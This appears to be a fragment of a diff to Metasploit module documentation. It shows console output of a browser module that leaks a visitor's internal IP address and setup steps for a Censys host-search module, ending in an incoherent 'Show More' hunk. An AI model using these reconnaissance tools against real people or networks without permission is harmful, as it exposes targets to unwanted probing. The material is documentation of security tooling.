+[*] Auxiliary module running as background job 0.
+msf auxiliary(gather/browser_lanipleak) > 
+[*] Using URL: http://192.168.1.104:8080/mIV1EgzDiEEIMT
+[*] Server started.
+
+[*] 192.168.1.104: Sending response (2523 bytes)
+[+] 192.168.1.104: Found IP address: X.X.X.X
+```
@@ -3,10 +3,10 @@ The module use the Censys REST API to access the same data accessible through we
 ## Verification Steps

 1. Do: `use auxiliary/gather/censys_search`
-2. Do: `set CENSYS_UID XXXXXXXX-XXXX-XXXX-XXXX-XXXXXXXXXXXX`
-3. Do: `set CENSYS_SECRET XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX`
+2. Do: `set CENSYS_UID XXXXXXXX-XXXX-XXXX-XXXX-XXXXXXXXXXXX` (length: 32 (without dashes))
+3. Do: `set CENSYS_SECRET XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX` (length: 32)
 4. Do: `set CENSYS_SEARCHTYPE certificates`
-5: Do: `set CENSYS_DORK rapid7`
+5: Do: `set CENSYS_DORK query`
 6: Do: `run`

 ## Scenarios
--- a/Show More
+++ b/Show More
@@ -1 +1 @@
 .4.2
 .5.1